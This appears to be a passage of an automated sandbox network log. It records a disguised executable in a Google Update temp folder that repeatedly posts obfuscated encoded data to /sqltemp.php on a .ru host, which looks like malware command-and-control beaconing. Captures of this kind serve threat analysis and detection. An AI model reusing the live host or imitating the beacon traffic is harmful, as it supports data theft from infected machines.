                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:41.251220942 CET | 1124 | OUT | Data Raw: 53 52 5a 54 51 5a 54 52 58 56 52 59 56 5d 59 55 5b 52 54 5f 55 5d 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SRZTQZTRXVRYV]YU[RT_U]PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-',& =Y'8/9S#>,[(:+)X< 4<;2<79:&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:41.359993935 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:41.547441959 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2woTlwtnWC7r8jbSaBqZlmQBTIyWGX9ACP%2FD2M5ACPsy1XF30dUmrWx0jkudgHTdwiPGhgkdWFa64%2BJK6h%2BA%2Bd78mhVrpZll7Uq6jlg4AObiej3wgcT313MYEbQXFVuE4uKdE7W"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365c33d5d236a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3628&min_rtt=1929&rtt_var=4123&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=94029&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  121 | 192.168.2.6 | 62760 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:41.675725937 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:42.032387972 CET | 1124 | OUT | Data Raw: 56 50 5a 54 54 58 54 54 58 56 52 59 56 5f 59 5f 5b 53 54 5a 55 5b 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VPZTTXTTXVRYV_Y_[STZU[P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.'?&4%$0.:)#+)(>47T#++D$?'.:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:42.120174885 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:42.291538954 CET | 796 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9IYY9sb1HjlKcGhsDgOWfOLdOMofAIJu4gunhdYsS1W69N69pKmyGHmRJzaLxX8N2j91X1ZLPoett%2Bgub1ocLR51d47kb91DuE3nHz3MvEaLyi0cRS9UzT3I6rtrqzAWmiW1NgCP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365c7f8587d13-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2470&min_rtt=1964&rtt_var=1750&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=242565&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                  Data Ascii: 42W\X
                                                                                                                  Jan 1, 2025 16:03:42.378343105 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  122 | 192.168.2.6 | 62761 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:42.335901022 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  123 | 192.168.2.6 | 62762 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:42.510298967 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:42.860558033 CET | 1124 | OUT | Data Raw: 53 55 5f 56 51 5a 51 56 58 56 52 59 56 5e 59 57 5b 5d 54 58 55 5d 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_VQZQVXVRYV^YW[]TXU]PZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-067$+B8T4=<Y+3*#70(C%<-&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:42.959820986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:43.130522966 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gtn34wXT3er20%2FRqtJKGsIY1Q3eyncmXfQwFZTevxb3y6cLkFFbHZ6PDVvYi2VMQYUhDL5hqw2dxVzPIO%2BgG82EJXmookGovzWotFrdOLtpGoKAlR51nPrY0174W4XfvFEd9DApC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365cd3c2d41b4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4353&min_rtt=1635&rtt_var=6050&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=62438&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  124 | 192.168.2.6 | 62763 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:43.258281946 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:43.610611916 CET | 1124 | OUT | Data Raw: 53 54 5f 5d 54 5f 54 5c 58 56 52 59 56 5f 59 54 5b 5c 54 51 55 55 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_]T_T\XVRYV_YT[\TQUUP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'5Y4Y%Y'7B/##(9;W(.,] ! +]=D%?<.:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:43.705312014 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:43.885575056 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9k5Og3UURlEj%2FPQrEPSozAoIA00I94Qr%2FnMHsbYeyeqm0fGzXQ8535jfttcWPh295JN6dXgeLFX5L6TcsUh9GEV%2Bq38PpoR1JL9bLnJMx9iwEGtT7etd7ltxxtT%2FzP5h%2FzO3JNba"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365d1dfb20f63-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4606&min_rtt=1517&rtt_var=6748&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=55655&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  125 | 192.168.2.6 | 62764 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:44.018285990 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:44.378343105 CET | 1124 | OUT | Data Raw: 56 52 5a 54 54 59 54 56 58 56 52 59 56 5a 59 57 5b 58 54 59 55 5c 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VRZTTYTVXVRYVZYW[XTYU\P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?"4?:%.;.:!7<_?+>>$[!17X*(5$?;.&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:44.471477985 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:44.729976892 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JF9pGiatDM2tnB3f0MwvgWIV4zdpoSgR3x7dMhitmGU0jn%2B72r9WSsUw707PgnvID56JoIfj7wbQs0zX12YFUhi8cnlJrKEVSXZZKC%2FxsQoWzd30NdOWcBqcbjnJuhUC2AaSgXZE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365d6ac068ccd-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1899&rtt_var=787&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=663334&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  126 | 192.168.2.6 | 62765 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:44.864994049 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:45.219928026 CET | 1124 | OUT | Data Raw: 53 55 5f 5d 54 5a 54 50 58 56 52 59 56 5a 59 56 5b 59 54 50 55 55 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_]TZTPXVRYVZYV[YTPUUP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.0Y)#&'-8/\.!.'+)'S*/43<*&/7U-&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:45.307310104 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:45.482405901 CET | 815 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2FcPveT%2Bs7MLCT0%2FJ%2BnWevkyr%2FSHe2tYwDrUTgMb07v3FkTHJd51LcUvUbHaPj9o2WFfEQBke32%2BCQ%2Fpr8QingNYcmI3yK4RARWJ5zwCzA1D0PR%2BboeehlqA3REwn1VFIT0l6L1W"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365dbec0e4408-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2163&min_rtt=1662&rtt_var=1625&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=257495&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  127 | 192.168.2.6 | 62766 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:45.624072075 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:45.969851017 CET | 1124 | OUT | Data Raw: 56 56 5a 54 54 5d 54 56 58 56 52 59 56 5b 59 55 5b 5d 54 51 55 58 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VVZTT]TVXVRYV[YU[]TQUXPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?-X7\'X'B8:1 [/<#V)>+#2<&&Y+R,*&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:46.070389986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:46.335175991 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kKKWn68WSMLQWJ%2FAAc72arAhYwdsJLm3wei4CPBfyhKc%2B6gm3OLfMy0duYNpd9%2B9E4iV5%2BZ3p3MM8CV%2FRWllM73yGHh8NkHxClSz2JoBP05Dh3ueZoP1QKceEavNyW3ft6znB1rA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365e0ae660f49-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4005&min_rtt=1733&rtt_var=5195&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=73318&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  128 | 192.168.2.6 | 62767 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:46.474622965 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:46.829307079 CET | 1124 | OUT | Data Raw: 56 57 5a 53 54 51 54 55 58 56 52 59 56 5c 59 5e 5b 52 54 5e 55 54 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VWZSTQTUXVRYV\Y^[RT^UTPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Z'Y5]4<!]0-?/:!>8Z())$!13[+!B%?W-:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:46.921832085 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:47.184758902 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sZF4eTJB5Q10ur%2FFxYJM8jvzU99Je0qVD0%2Bg16bTSxMvl6ivnMMVFJNiF8Xe1BmbS6OXV%2Fa8SKd0OFajee0oF0kbOd5Syxk9xerhTVWXD9eSBEFcMXfRLwW572OHAlVSO%2BJvyCb%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365e5fda6c338-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1613&rtt_var=977&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=470512&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  129 | 192.168.2.6 | 62768 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:47.321032047 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  130 | 192.168.2.6 | 62769 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:47.399132967 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:47.751359940 CET | 1964 | OUT | Data Raw: 53 50 5f 53 51 5d 51 56 58 56 52 59 56 50 59 50 5b 5f 54 58 55 5e 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
